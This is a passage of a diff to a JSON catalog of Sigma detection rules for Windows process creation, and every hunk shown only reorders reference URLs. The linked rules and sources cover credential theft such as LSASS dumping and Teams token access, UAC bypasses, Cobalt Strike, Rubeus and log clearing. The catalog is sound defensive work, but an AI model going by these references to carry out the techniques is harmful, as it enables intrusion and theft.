+57823,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" ], "tags": [ @@ -57917,8 +57917,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ @@ -58119,8 +58119,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" ], "tags": [ @@ -58213,8 +58213,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ @@ -58272,8 +58272,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" ], "tags": [ @@ -58297,9 +58297,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], @@ -58324,8 +58324,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" ], "tags": [ @@ -58349,9 +58349,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" ], "tags": [ @@ -58500,8 +58500,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/972186477512839170", - "https://securelist.com/apt-slingshot/84312/", "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" ], "tags": [ @@ -58535,9 +58535,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" ], "tags": "No established tags" @@ -58559,13 +58559,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", - "https://twitter.com/xorJosh/status/1598646907802451969", - "https://ngrok.com/docs", - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://ngrok.com/docs", + "https://twitter.com/xorJosh/status/1598646907802451969", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" ], "tags": [ @@ -58645,8 +58645,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" @@ -58733,8 +58733,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/999090532839313408", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://twitter.com/pabraeken/status/995837734379032576", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" ], "tags": [ @@ -58767,8 +58767,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" ], "tags": [ @@ -58850,8 +58850,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" ], "tags": [ @@ -58884,9 +58884,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", - "https://twitter.com/bohops/status/1477717351017680899?s=12", "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" ], "tags": [ @@ -58909,9 +58909,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], "tags": [ @@ -59004,10 +59004,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" ], "tags": [ @@ -59109,8 +59109,8 @@ "refs": [ "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" ], "tags": [ @@ -59328,8 +59328,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" ], "tags": [ @@ -59521,8 +59521,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", "https://github.com/GhostPack/Rubeus", + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" ], @@ -59635,11 +59635,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" ], "tags": [ @@ -59810,8 +59810,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" ], "tags": [ @@ -59878,10 +59878,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" ], "tags": [ @@ -59915,8 +59915,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ @@ -59971,8 +59971,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" ], "tags": [ @@ -60074,8 +60074,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" ], "tags": [ @@ -60110,8 +60110,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml" ], "tags": [ @@ -60287,8 +60287,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" ], "tags": [ @@ -60324,8 +60324,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" ], "tags": [ @@ -60468,8 +60468,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" ], "tags": [ @@ -60561,8 +60561,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" ], "tags": [ @@ -60652,8 +60652,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" ], "tags": [ @@ -60694,9 +60694,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], @@ -60796,8 +60796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://redcanary.com/blog/raspberry-robin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ @@ -60897,9 +60897,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" ], "tags": [ @@ -60992,9 +60992,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], "tags": [ @@ -61037,8 +61037,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" ], @@ -61186,8 +61186,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/intelligence-insights-december-2021", "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "https://redcanary.com/blog/intelligence-insights-december-2021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" ], "tags": [ @@ -61271,8 +61271,8 @@ "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -61296,9 +61296,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ @@ -61851,8 +61851,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" ], "tags": [ @@ -62088,11 +62088,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ @@ -62407,8 +62407,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" ], "tags": [ @@ -62614,8 +62614,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" ], "tags": [ @@ -62639,8 +62639,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" ], "tags": [ @@ -62663,8 +62663,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" ], "tags": [ @@ -62791,8 +62791,8 @@ "logsource.product": "windows", "refs": [ "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://twitter.com/splinter_code/status/1483815103279603714", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://twitter.com/splinter_code/status/1483815103279603714", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" ], @@ -62909,8 +62909,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" ], "tags": [ @@ -63143,8 +63143,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", "https://github.com/shantanu561993/SharpChisel", + "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" ], "tags": [ @@ -63178,8 +63178,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", 